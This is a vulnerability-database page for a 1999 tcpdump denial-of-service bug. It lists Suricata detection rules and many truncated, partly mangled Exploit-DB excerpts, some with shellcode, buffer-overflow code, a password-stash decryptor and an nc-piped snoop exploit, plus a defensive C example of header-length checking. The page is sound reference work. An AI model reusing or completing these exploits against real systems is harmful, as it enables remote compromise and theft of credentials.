CVE-1999-1024
Published 2001-11-28
Priority P4 · Severity high · CVSS 2.0 base score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Public exploit: yes
EPSS: 2.91% (85.3 percentile)
ip_print procedure in Tcpdump 3.4a allows remote attackers to cause a denial of service via a packet with a zero length header, which causes an infinite loop and core dump when tcpdump prints the packet.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lbl | tcpdump | — | — |
Detection rules indexed with this entry cover CVE-1999-0696 (the rpc.cmsd CMSD_CREATE overflow), not the tcpdump issue; no rule for CVE-1999-1024 is listed. A packet with ihl 0 is in any case flagged as invalid by Suricata's own IPv4 decoder (decode event ipv4.hlen_too_small) rather than being parsed further.
Suricata · 2010-09-23 · CVE-1999-0696
GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt"; flow:established,to_server; content:"|00 01 86 E4|"; depth:4; offset:16; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101908; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata · 2010-09-23 · CVE-1999-0696
GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt"; content:"|00 01 86 E4|"; depth:4; offset:12; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101907; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB · 2011-08-10 · CVE-1999-1510
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow
---
#!/usr/bin/python
# BisonFTP Server \n" %(sys.argv[0])
sys.exit()
print "\n[!] Connecting to %s ..." %(sys.argv[1])
# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(5)
# padding
buffer = "\x90" * 1092
# 368 bytes shellcode
buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09
Exploit-DB · 2010-07-03 · CVE-1999-1053
The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)
---
##
# $Id: guestbook_ssi_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Matt Wright guestbook.pl Arbitrary Command Execution',
'Description' => %q{
The Matt Wright guestbook.pl [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9671 $',
'References' =>
[
[ 'CVE', '1999-1053' ],
[ 'OSVDB', '84' ],
[ 'BID', '776' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
Exploit-DB · 1999-12-07 · CVE-1999-0973
Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'print_domain_name' Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/858/info
If a Solaris machine is running snoop in verbose mode, it may be possible to compromise it remotely by exploiting a buffer overflow in snoop. The problem is a buffer with a predefined length of 1024 that can be overflowed in the print_domain_name function. Arbitrary code would execute with the privileges of the user running snoop, which is root.
/*
by: K2,
version .2
this is a funny Solaris.
remote Solaris 2.7 x86 snoop exploit
rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW
run with ( ./snp ) | nc -u target_host_network 53
requires target host to be running "snoop"
verified with patch 108483-01
thx str/horizon for she
Exploit-DB · 1999-11-05 · CVE-1999-1053
The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Matt Wright guestbook.pl Arbitrary Command Execution',
'Description' => %q{
The Matt Wright guestbook.pl [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '1999-1053' ],
[ 'OSVDB', '84' ],
[ 'BID', '776' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
Exploit-DB · 1999-10-24 · CVE-1999-0944
IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password
---
source: https://www.securityfocus.com/bid/1763/info
IBM WebSphere ships with a tool called 'ikeyman' that encrypts server certificates/key pairs when the IBM HTTP Server and SSL connections are enabled. Ikeyman stores the password in a stash file, which can be easily decrypted with a freely available script (each byte is XORed with 0xF5).
#!/usr/bin/perl -w
#
# unstash.pl - "decrypt" IBM HTTP server stash files. No, really. They
# *are* this pathetic.
#
# sploit (BoByRiTe) 1999, Major Malfunction, code by Ben Laurie, cos I
# dudn't dud perly thing.
use strict;
die "Usage: $0 \n" if $#ARGV != 0;
my $file=$ARGV[0];
open(F,$file) || die "Can't open $file: $!";
my $stash;
read F,$stash,1024;
# every byte of the stash is XORed with 0xf5; undo it
my @unstash=map { $_^0xf5 } unpack("C*",$stash);
# print the recovered bytes up to the first NUL terminator
foreach my $c (@unstash) { last unless $c; print chr($c); }
print "\n";
Exploit-DB · 1999-08-25 · CVE-1999-0744
Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET
---
source: https://www.securityfocus.com/bid/1024/info
A GET request containing over 4080 characters will cause the httpd.exe process to crash within Netscape Enterprise Server 3.6, resulting in a Dr. Watson error. Arbitrary code can be executed remotely at this point.
Netscape Enterprise Server 3.5 running on either Netware or Solaris is not known to be susceptible to this issue.
GET /(4080 character string) HTTP/1.0
Exploit-DB · 1999-07-13 · CVE-1999-0696
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*
* Unixware 7.x rpc.cmsd exploit by jGgM
* http://www.netemperor.com/en/
* EMail: [email protected]
*/
#include
#include
#include
#include
#include
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define BUFFER_SIZE 1036
#define SHELL_START 1024
#define RET_LENGTH 12
#define ADJUST 100
#define NOP 0x90
#define LEN 68
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard [2000]*/
/* syscall: [200
Exploit-DB · 1999-06-16 · CVE-1999-1024
tcpdump 3.4 - Protocol Four / Zero Header Length
---
// source: https://www.securityfocus.com/bid/313/info
A vulnerability in tcpdump causes it to enter an infinite loop within the procedure ip_print() from the file print_ip.c when it receives a packet with IP protocol number four and a zero header length and it tries to print it. This may allow remote malicious users to evade network monitoring.
/*
tcpdump bug 3.4a? by BLADI ([email protected]);
On receiving an ip packet with Protocol-4 and ihl=0, tcpdump enters
an infinite loop within the procedure ip_print() from file print_ip.c
This happens because the header length (ihl) equals '0' and tcpdump
tries to print the packet
I've tried the bug in different OS's
Linux:
SuSE 6.x:
K2.0.36 tcpdump consumes all the system memory
K2.2.5
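The mechanism described above (protocol 4 plus ihl 0 makes ip_print() re-enter on the same header) can be shown without sending anything on the wire. The C below is an added example, not BLADI's exploit nor tcpdump's own source: it models the unchecked header walk beside a hardened one that validates the header length first. The two packets are constructed in memory from the description on this page; the names ip_walk_naive, ip_walk_checked and the result codes are this example's own, and the iteration cap exists only so the naive walk returns instead of looping forever.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Result codes shared by both header walkers. */
enum ip_walk_result {
    IPW_OK = 0,          /* reached an inner header that is not IP-in-IP */
    IPW_BAD_HLEN = 1,    /* header length below 20 bytes or past the buffer */
    IPW_TRUNCATED = 2,   /* fewer than 20 bytes left where a header should be */
    IPW_LOOP_CAPPED = 3  /* demo-only cap hit: the walk made no progress */
};

#define IPV4_MIN_HLEN 20u
#define IPPROTO_IPIP_NUM 4u   /* protocol 4 = IP-in-IP, the case ip_print() re-enters on */

/* Constructed trigger (assumption: built from the page's description, not bytes
 * taken from the exploit): version 4, ihl 0, total length 20, protocol 4. */
static const uint8_t trigger_pkt[20] = {
    0x40, 0x00, 0x00, 0x14,   /* 0x40 = version 4, ihl 0; tos; total length 20 */
    0x00, 0x00, 0x00, 0x00,   /* identification, flags/fragment offset */
    0x40, 0x04, 0x00, 0x00,   /* ttl 64, protocol 4 (IP-in-IP), checksum (not verified here) */
    0x0a, 0x00, 0x00, 0x01,   /* src 10.0.0.1 */
    0x0a, 0x00, 0x00, 0x02    /* dst 10.0.0.2 */
};

/* Constructed well-formed IP-in-IP packet: outer ihl 5 / protocol 4, inner ihl 5 / protocol 6. */
static const uint8_t benign_pkt[40] = {
    0x45, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, 0x00, 0x40, 0x04, 0x00, 0x00,
    0x0a, 0x00, 0x00, 0x01, 0x0a, 0x00, 0x00, 0x02,
    0x45, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x40, 0x06, 0x00, 0x00,
    0xc0, 0xa8, 0x01, 0x01, 0xc0, 0xa8, 0x01, 0x02
};

/* Walk modelled on the tcpdump 3.4 behaviour: hlen comes straight from ihl and is never
 * validated, and protocol 4 means "parse the bytes after this header as another IP header".
 * With ihl 0 the next header starts at the same offset, so the real code never terminates;
 * 'cap' is only here so this demo returns. */
int ip_walk_naive(const uint8_t *pkt, size_t len, unsigned cap, unsigned *hops)
{
    size_t off = 0;
    unsigned n = 0;
    while (n < cap) {
        if (len - off < IPV4_MIN_HLEN)
            return IPW_TRUNCATED;
        unsigned hlen = (pkt[off] & 0x0fu) * 4u;  /* trusted as-is */
        uint8_t proto = pkt[off + 9];
        n++;
        if (proto != IPPROTO_IPIP_NUM) {
            *hops = n;
            return IPW_OK;
        }
        off += hlen;   /* hlen == 0: same header again */
    }
    *hops = n;
    return IPW_LOOP_CAPPED;
}

/* Hardened walk: reject a header length below the 20-byte minimum or beyond the captured
 * bytes before using it (the kind of bad-hlen check later tcpdump releases added). A valid
 * hlen is at least 20, so every iteration advances and the loop must terminate. */
int ip_walk_checked(const uint8_t *pkt, size_t len, unsigned *hops)
{
    size_t off = 0;
    unsigned n = 0;
    for (;;) {
        if (len - off < IPV4_MIN_HLEN)
            return IPW_TRUNCATED;
        unsigned hlen = (pkt[off] & 0x0fu) * 4u;
        if (hlen < IPV4_MIN_HLEN || hlen > len - off)
            return IPW_BAD_HLEN;
        uint8_t proto = pkt[off + 9];
        n++;
        if (proto != IPPROTO_IPIP_NUM) {
            *hops = n;
            return IPW_OK;
        }
        off += hlen;
    }
}

int main(void)
{
    unsigned hops = 0;
    int r = ip_walk_naive(trigger_pkt, sizeof trigger_pkt, 1000, &hops);
    printf("naive walk on ihl=0 packet: result %d after %u headers, offset never advanced\n", r, hops);
    r = ip_walk_checked(trigger_pkt, sizeof trigger_pkt, &hops);
    printf("checked walk on ihl=0 packet: result %d (bad header length rejected)\n", r);
    r = ip_walk_checked(benign_pkt, sizeof benign_pkt, &hops);
    printf("checked walk on benign IP-in-IP: result %d, %u headers\n", r, hops);
    return 0;
}
```

The upper bound on hlen matters as much as the lower one: a header length larger than the remaining capture would move the offset past the buffer, which is a separate out-of-bounds read rather than the loop this CVE describes. Checking both before touching any field after the first byte is the pattern to apply to every length taken from a packet.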
Exploit-DB · 1999-05-28 · CVE-1999-1490
RedHat Linux 5.1 - xosview
---
// source: https://www.securityfocus.com/bid/362/info
xosview is an X11 system monitoring application that ships with RedHat 5.1 installed setuid root. A buffer overflow vulnerability was found in Xrm.cc, the offending code listed below:
char userrfilename[1024];
strcpy(userrfilename, getenv("HOME"));
The userrfilename buffer can be overflowed through a long HOME environment variable, and arbitrary code executed to gain root access locally.
/*
* xosview 1.5.1 buffer overrun exploit
* brought to you by Kossak ([email protected])
*
* yep, this is a shameless rip from Aleph's tutorials, but it sure
* works... Lets keep those exploits coming!! :)
* Thanks to Chris Evans for posting the bug.
*/
/* NOTE!!! xosview needs an open X display for this to work, so remember
* to modify the source (line 62
Exploit-DB · 1999-01-22 · CVE-1999-0448
Microsoft IIS 4 (Windows NT) - Log Avoidance
---
// source: https://www.securityfocus.com/bid/191/info
An HTTP GET request against an IIS 4 server is not logged if the request is longer than 10150 bytes.
/* Compile with eg Visual C++ and link with wsock32.lib */
#include
#include
#include
int main (int argc, char *argv[])
{
int snd, rcv, err, portno,a=0,b, res;
char resp[1024];
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sa;
struct hostent *he;
SOCKET sock;
if (argc !=2)
{
printf("Usage:\nc:\\>%s target_machine\n\nDavid Litchfield\n21st January 1999\n", argv[0]);
return 0;
}
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
{
printf("No winsock.dll\n");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HI
Exploit-DB · 1999-01-19 · CVE-1999-0451
Linux Kernel 2.0 - TCP Port Denial of Service
---
/*
source: https://www.securityfocus.com/bid/343/info
It is possible to leak kernel memory and render TCP ports above 1024 unusable, locked forever in the CLOSE_WAIT state in linux kernels prior to the late 2.1.x and 2.2.0pre releases. In addition to being intentionally exploited, unix applications compiled on linux that are multithreaded may also cause these problems.
Below is a harmless example of the exploit:
*/
// This program will kill a random port on a linux machine. The kernel will
// forever listen to that port and send the connections nowhere. Tested with
// Linux kernel 2.0.35 and libc-2.0.7. Requires LinuxThreads to compile,
// but removing LinuxThreads from your system will not solve the problem.
// Discovered by Dav
Exploit-DB · 1998-07-17 · CVE-1999-0005
Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/130/info
A vulnerability exists in certain imapd implementations that allow an attacker to execute arbitrary code remotely. In certain instances, the code to be executed will be run with root privilege.
IMAP supports a command 'AUTHENTICATE' which specifies the type of authentication mechanism to be used to open a mailbox. The value passed to the AUTHENTICATE command is copied into a buffer of size 1024. The maximum size of this value, however, is 8192 characters. A failure to bound the read value to 1024 results in a buffer overflow.
The code which creates this problem is as follows:
char *mail_auth (char *mechanism,authresponse_t resp,int
Exploit-DB · 1998-06-25 · CVE-1999-0125
RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (2)
---
// source: https://www.securityfocus.com/bid/393/info
A buffer overrun exists in the /bin/mailx program. This program was originally developed as part of BSD, and is available on many Unix systems. By supplying a long, well-crafted buffer as the username argument, an attacker can execute arbitrary code. On some systems, this results in the ability to execute code as group mail.
// this is nothing special, it allows you to read files that are
// readable by the group 'mail'.
// feedback: segv
#include
#include
#include
#include
#include
#include
#include
void usage(char *prog);
void main(int argc, char *argv[])
{
char buffer[1024];
int fd, bytes;
if(argc != 3)
usage(argv[0]);
if((strcmp(argv[1],"-c")))
u
Exploit-DB · 1997-05-14 · CVE-1999-0040
LibXt - 'XtAppInitialize()' Local Overflow *xterm
---
/*
cxterm buffer overflow exploit for Linux. This code is tested on
both Slackware 3.1 and 3.2.
Ming Zhang
[email protected]
*/
#include
#include
#include
#include
#define CXTERM_PATH "/usr/X11R6/bin/cxterm"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i,OffSet = DEFAULT_OFFSET;
/* use a different offset if you find this program doesn'
No writeups or analysis indexed.
References
http://marc.info/?l=bugtraq&m=92955903802773&w=2
http://marc.info/?l=bugtraq&m=92963447601748&w=2
http://marc.info/?l=bugtraq&m=92989907627051&w=2
http://www.securityfocus.com/bid/313